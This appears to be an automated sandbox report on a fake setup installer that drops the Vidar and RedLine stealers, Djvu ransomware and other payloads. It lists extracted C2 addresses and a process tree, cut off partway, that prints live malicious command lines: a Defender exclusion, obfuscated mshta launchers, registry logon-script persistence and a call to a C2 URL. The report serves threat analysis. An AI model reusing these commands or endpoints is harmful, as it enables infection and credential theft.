Resubmissions

11-09-2021 09:47

210911-lr7snabca6 10

10-09-2021 20:48

210910-zlwebsaeh8 10

Analysis

  • max time kernel
    614s
  • max time network
    1819s
  • platform
    windows10_x64
  • resource
    win10-fr
  • submitted
    11-09-2021 09:47

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.4MB

  • MD5

    65eed0fdbee8b81c1b9118f86700c6fd

  • SHA1

    fcca1e88a99e2f20403e963b798e3f68f58d638d

  • SHA256

    3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d

  • SHA512

    f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 60 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 14 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 19 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 36 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 23 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 11 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2808
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies registry class
      PID:756
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:3040
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:5100
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3480
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4108
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri192c305b4a.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3288
            • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri192c305b4a.exe
              Fri192c305b4a.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3692
              • C:\Users\Admin\AppData\Local\Temp\tmp1ED8_tmp.exe
                "C:\Users\Admin\AppData\Local\Temp\tmp1ED8_tmp.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4848
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c cmd < Attesa.wmv
                  8⤵
                    PID:5440
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd
                      9⤵
                        PID:5152
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
                          10⤵
                            PID:6768
                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                            Adorarti.exe.com u
                            10⤵
                            • Executes dropped EXE
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:5792
                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                              11⤵
                              • Executes dropped EXE
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:5448
                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                12⤵
                                • Executes dropped EXE
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:4184
                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                  13⤵
                                  • Executes dropped EXE
                                  PID:4636
                          • C:\Windows\SysWOW64\PING.EXE
                            ping localhost
                            10⤵
                            • Runs ping.exe
                            PID:4968
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Fri191454c4b4.exe
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3564
                  • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri191454c4b4.exe
                    Fri191454c4b4.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4480
                    • C:\ProgramData\2025471.exe
                      "C:\ProgramData\2025471.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2272
                    • C:\ProgramData\6150466.exe
                      "C:\ProgramData\6150466.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:4824
                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:5348
                    • C:\ProgramData\8296043.exe
                      "C:\ProgramData\8296043.exe"
                      7⤵
                        PID:5268
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\ProgramData\8296043.exe"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if """" == """" for %D in ( ""C:\ProgramData\8296043.exe"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                          8⤵
                            PID:5324
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\ProgramData\8296043.exe" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "" == "" for %D in ( "C:\ProgramData\8296043.exe" ) do taskkill /Im "%~NxD" /f
                              9⤵
                                PID:5344
                                • C:\Users\Admin\AppData\Local\Temp\uIA5.eXE
                                  UiA5.eXe /P0NTOdcYDlh~kX43m7
                                  10⤵
                                  • Executes dropped EXE
                                  PID:3728
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if ""/P0NTOdcYDlh~kX43m7"" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                                    11⤵
                                      PID:4512
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "/P0NTOdcYDlh~kX43m7" == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" ) do taskkill /Im "%~NxD" /f
                                        12⤵
                                          PID:5484
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" MVqJ65P._,hfmnID
                                        11⤵
                                        • Loads dropped DLL
                                        PID:5248
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /Im "8296043.exe" /f
                                      10⤵
                                      • Kills process with taskkill
                                      PID:6108
                              • C:\ProgramData\4850446.exe
                                "C:\ProgramData\4850446.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4144
                                • C:\ProgramData\4850446.exe
                                  "C:\ProgramData\4850446.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:5608
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 852
                                  8⤵
                                  • Program crash
                                  PID:5844
                              • C:\ProgramData\3025836.exe
                                "C:\ProgramData\3025836.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:5336
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4392
                            • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri195cd4dbfdf37897.exe
                              Fri195cd4dbfdf37897.exe
                              6⤵
                              • Executes dropped EXE
                              PID:3412
                              • C:\Users\Admin\AppData\Local\Temp\is-FIJOQ.tmp\Fri195cd4dbfdf37897.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-FIJOQ.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$701DA,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri195cd4dbfdf37897.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of FindShellTrayWindow
                                PID:4516
                                • C:\Users\Admin\AppData\Local\Temp\is-CRF0F.tmp\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-CRF0F.tmp\Setup.exe" /Verysilent
                                  8⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Drops file in Program Files directory
                                  PID:5640
                                  • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                    "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Modifies registry class
                                    PID:6172
                                    • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                      "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
                                      10⤵
                                      • Executes dropped EXE
                                      PID:3084
                                      • C:\ProgramData\284718.exe
                                        "C:\ProgramData\284718.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        PID:1748
                                      • C:\ProgramData\6768176.exe
                                        "C:\ProgramData\6768176.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: SetClipboardViewer
                                        PID:4680
                                      • C:\ProgramData\4643214.exe
                                        "C:\ProgramData\4643214.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        PID:6492
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\ProgramData\4643214.exe"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if """" == """" for %D in ( ""C:\ProgramData\4643214.exe"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                                          12⤵
                                            PID:1404
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\ProgramData\4643214.exe" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "" == "" for %D in ( "C:\ProgramData\4643214.exe" ) do taskkill /Im "%~NxD" /f
                                              13⤵
                                                PID:5444
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  14⤵
                                                    PID:5440
                                                  • C:\Users\Admin\AppData\Local\Temp\uIA5.eXE
                                                    UiA5.eXe /P0NTOdcYDlh~kX43m7
                                                    14⤵
                                                      PID:4952
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if ""/P0NTOdcYDlh~kX43m7"" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                                                        15⤵
                                                          PID:1328
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "/P0NTOdcYDlh~kX43m7" == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" ) do taskkill /Im "%~NxD" /f
                                                            16⤵
                                                              PID:2608
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" MVqJ65P._,hfmnID
                                                            15⤵
                                                            • Loads dropped DLL
                                                            PID:3304
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /Im "4643214.exe" /f
                                                          14⤵
                                                          • Kills process with taskkill
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5808
                                                  • C:\ProgramData\8894326.exe
                                                    "C:\ProgramData\8894326.exe"
                                                    11⤵
                                                    • Executes dropped EXE
                                                    PID:1592
                                                • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                                  10⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2760
                                                  • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                    C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                    11⤵
                                                      PID:5152
                                                  • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                    10⤵
                                                      PID:6392
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
                                                        11⤵
                                                          PID:5820
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            12⤵
                                                              PID:5484
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im "foradvertising.exe" /f
                                                              12⤵
                                                              • Kills process with taskkill
                                                              PID:5524
                                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                                          10⤵
                                                            PID:6932
                                                            • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                                              11⤵
                                                                PID:4844
                                                            • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                              10⤵
                                                              • Loads dropped DLL
                                                              • Enumerates connected drives
                                                              • Suspicious use of SetThreadContext
                                                              • Modifies system certificate store
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4476
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631094395 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                11⤵
                                                                  PID:2536
                                                              • C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
                                                                10⤵
                                                                • Checks whether UAC is enabled
                                                                • Drops file in Program Files directory
                                                                PID:4216
                                                              • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                10⤵
                                                                  PID:5148
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-75B4M.tmp\IBInstaller_74449.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-75B4M.tmp\IBInstaller_74449.tmp" /SL5="$C056A,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                    11⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:4612
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-351JK.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                      12⤵
                                                                        PID:5220
                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-351JK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                          13⤵
                                                                          • Drops file in Windows directory
                                                                          PID:5544
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                        12⤵
                                                                          PID:6196
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                            13⤵
                                                                              PID:1292
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                            12⤵
                                                                            • Checks computer location settings
                                                                            PID:6932
                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                            12⤵
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:2832
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-351JK.tmp\{app}\vdi_compiler.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-351JK.tmp\{app}\vdi_compiler"
                                                                            12⤵
                                                                              PID:4228
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-351JK.tmp\{app}\vdi_compiler.exe"
                                                                                13⤵
                                                                                  PID:5960
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping localhost -n 4
                                                                                    14⤵
                                                                                    • Runs ping.exe
                                                                                    PID:6444
                                                                          • C:\Users\Admin\AppData\Local\Temp\vpn.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                            10⤵
                                                                              PID:4168
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-QGJT1.tmp\vpn.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-QGJT1.tmp\vpn.tmp" /SL5="$F056A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                11⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                • Modifies registry class
                                                                                • Modifies system certificate store
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:3056
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                  12⤵
                                                                                    PID:5924
                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                      tapinstall.exe remove tap0901
                                                                                      13⤵
                                                                                      • Checks SCSI registry key(s)
                                                                                      PID:4416
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                    12⤵
                                                                                      PID:7024
                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                        13⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Modifies system certificate store
                                                                                        PID:5272
                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                      12⤵
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:5728
                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                      12⤵
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:3840
                                                                                • C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                  10⤵
                                                                                  • Enumerates connected drives
                                                                                  • Modifies system certificate store
                                                                                  PID:7040
                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631094395 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                    11⤵
                                                                                      PID:6572
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                    10⤵
                                                                                    • Enumerates connected drives
                                                                                    • Modifies system certificate store
                                                                                    PID:5556
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631094395 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                      11⤵
                                                                                        PID:5464
                                                                                    • C:\Users\Admin\AppData\Local\Temp\askinstall45.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"
                                                                                      10⤵
                                                                                        PID:6624
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          11⤵
                                                                                            PID:6972
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              12⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5872
                                                                                        • C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"
                                                                                          10⤵
                                                                                            PID:6120
                                                                                            • C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"
                                                                                              11⤵
                                                                                                PID:6932
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"
                                                                                              10⤵
                                                                                              • Checks computer location settings
                                                                                              PID:508
                                                                                              • C:\Users\Admin\Documents\x1jKPgHFu8NfOFUEb3sHI1YF.exe
